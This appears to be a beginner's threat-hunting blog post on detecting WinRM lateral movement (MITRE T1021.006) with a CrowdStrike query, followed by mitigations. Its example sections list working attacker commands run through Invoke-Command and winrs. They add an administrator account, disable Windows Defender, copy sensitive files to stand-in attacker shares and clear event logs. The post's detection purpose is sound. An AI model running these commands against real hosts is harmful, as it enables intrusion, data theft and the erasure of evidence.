When it comes to threat hunting, Falcon's Advanced event search is a great way to search for malicious activity in your network. As I have begun my cybersecurity career, I have been given several 'scavenger hunts' to get up to speed on the query languages in our environment.
In this one, we were given very little information. We are to answer three main questions. For security reasons, and because I don't feel quite comfortable just yet sharing information about the network on the internet, I won't include any screenshots of the hunt. Like any hunt, we need to figure out what has happened, how it happened and how we can mitigate this attack technique.
I was tasked with focusing on hunting for MITRE ATT&CK Technique T1021.006: Remote Services: Windows Remote Management (WinRM) using CrowdStrike.
Windows Remote Management
Windows Remote Management (WinRM) is Microsoft’s implementation of the Web Services-Management (WS-Management) protocol. It’s a SOAP-based (Simple Object Access Protocol) protocol designed to enable communication between systems, even across different vendors.
One of the key features of WinRM is its ability to interact with Windows Management Instrumentation (WMI) to provide management data.
This makes it incredibly useful for tasks like gathering system information, automating administrative tasks, and managing hardware through the Intelligent Platform Management Interface (IPMI).
Its utility for legitimate administration also makes it quite a good tool for adversaries. Once Initial Access is gained, an actor can execute remote commands on other machines in the network to move laterally or to gather more information about the network.
Pre-requisites
- What is SOAP?
- How is WinRM used normally?
- Know what threat hunting is? I think? If you found this then you were probably looking for it…
SOAP
SOAP is an XML-based protocol for interacting with web services, well… simply. Basically the message is an XML snippet and must:
- Use the SOAP Envelope namespace
- Not contain a document type definition (DTD)
- Not contain processing instructions.
Here's an example message from W3 Schools:
<?xml version="1.0"?>
<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"
soap:encodingStyle="http://www.w3.org/2003/05/soap-encoding">
<soap:Header></soap:Header>
<soap:Body>
<soap:Fault></soap:Fault>
</soap:Body>
</soap:Envelope>
So the message goes in as XML, and the WinRM service accepts these messages and acts on them.
WinRM as sold by Microsoft
Here is a VBScript from Microsoft's documentation! It opens a WinRM session to a remote computer, enumerates the Win32_OperatingSystem WMI class over WS-Management, and shows the XML output from WinRM.
Const RemoteComputer = "ComputerName.domain.com"
Set objWsman = CreateObject("Wsman.Automation")
Set objConnectionOptions = objWsman.CreateConnectionOptions
objConnectionOptions.UserName = "Username"
objConnectionOptions.Password = "Password"
iFlags = objWsman.SessionFlagUseKerberos Or _
         objWsman.SessionFlagCredUserNamePassword
Set objSession = objWsman.CreateSession("https://" & RemoteComputer, _
                                        iFlags, objConnectionOptions)
strResource = "http://schemas.microsoft.com/wbem/wsman/1/" & _
              "wmi/root/cimv2/Win32_OperatingSystem"
Set objResponse = objSession.Enumerate(strResource)
While Not objResponse.AtEndOfStream
    DisplayOutput(objResponse.ReadItem)
Wend

'****************************************************
' Displays WinRM XML message using built-in XSL
'****************************************************
Sub DisplayOutput(strWinRMXml)
    Dim xmlFile, xslFile
    Set xmlFile = CreateObject("MSXml2.DOMDocument.3.0")
    Set xslFile = CreateObject("MSXml2.DOMDocument.3.0")
    xmlFile.LoadXml(strWinRMXml)
    xslFile.Load("WsmTxt.xsl")
    Wscript.Echo xmlFile.TransformNode(xslFile)
End Sub
Understanding T1021.006: Remote Services - Windows Remote Management
WinRM is a legitimate Windows feature used for remote management. However, adversaries often abuse it to execute commands or move laterally within a network. Detecting such activity requires a combination of behavioral analysis and event correlation.
WinRM is the service and protocol used to interact with a remote system.
Example 1: Using Invoke-Command for Remote Execution
# Get the hostname of the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { hostname }
# Retrieve detailed system information
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { systeminfo }
# Get the IP configuration of the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { ipconfig }
# List all user accounts on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net user }
# List all groups on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net localgroup }
# Create a new user with administrative privileges
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net user BadGuy Password123 /add }
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock { net localgroup administrators BadGuy /add }
# Disable Windows Defender
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Set-MpPreference -DisableRealtimeMonitoring $true }
# Exfiltrate sensitive files
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Copy-Item -Path "C:\SensitiveData\*" -Destination "\\BadGuyServer\ExfilShare"
}
# Clear the event logs on the remote system
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl System
}
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl Security
}
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
wevtutil cl Application
}
# Execute a command on another remote system from the current remote session
Invoke-Command -ComputerName "RemoteHost01" -ScriptBlock {
Invoke-Command -ComputerName "RemoteHost02" -ScriptBlock {
Get-Process
}
}
Example 2: Using winrs for Remote Execution
# Get the hostname of the remote system
winrs -r:RemoteHost01 hostname
# Get the IP configuration of the remote system
winrs -r:RemoteHost01 ipconfig
# Retrieve detailed system information
winrs -r:RemoteHost01 systeminfo
# List all user accounts on the remote system
winrs -r:RemoteHost01 net user
# List all groups on the remote system
winrs -r:RemoteHost01 net localgroup
# List shared resources on the remote system
winrs -r:RemoteHost01 net share
# Create a new user with administrative privileges
winrs -r:RemoteHost01 net user EvilUser Password123 /add
winrs -r:RemoteHost01 net localgroup administrators EvilUser /add
# Disable Windows Defender
winrs -r:RemoteHost01 powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
# Exfiltrate sensitive files
winrs -r:RemoteHost01 copy C:\SensitiveData\* \\AttackerServer\ExfilShare
# Clear the event logs on the remote system
winrs -r:RemoteHost01 wevtutil cl System
winrs -r:RemoteHost01 wevtutil cl Security
winrs -r:RemoteHost01 wevtutil cl Application
Basically: have access to a local machine -> execute commands on a remote host as the user on your local machine.
With these examples, we can see some of the things an adversary could possibly get away with.
Cool, now how do we hunt for it?
Threat Hunting for T1021.006 Remote Services
This is how I ended up looking for this specific threat.
in(field="#event_simpleName", values=["NetworkReceiveAcceptIP4", "ProcessRollup2"])
| LocalPort = 5985 OR LocalPort = 5986
  OR CommandLine = "*winrs.exe*" OR CommandLine = "*wsmprovhost.exe*"
  OR ParentBaseFileName = "*winrs.exe*" OR ParentBaseFileName = "*wsmprovhost.exe*"
| timestamp := formatTime(format="%m/%d/%Y %H:%M:%S", timezone="Place/Place") // Format the timestamp into something readable
| CommandLine = "*" // CommandLine contains something.
| groupBy([ComputerName], function=collect(
    [CommandLine, UserName, LocalIP, LocalPort, RemoteIP, RemotePort]
  ))
Mitigations for T1021.006 Remote Services
- If you don’t use it, disable it. M1042
- If it is necessary, use network segmentation and separate those hosts from the rest of the network. Ensure access only from the proper machines. M1030
- Make sure those network segments can only be accessed by separate WinRM accounts. M1026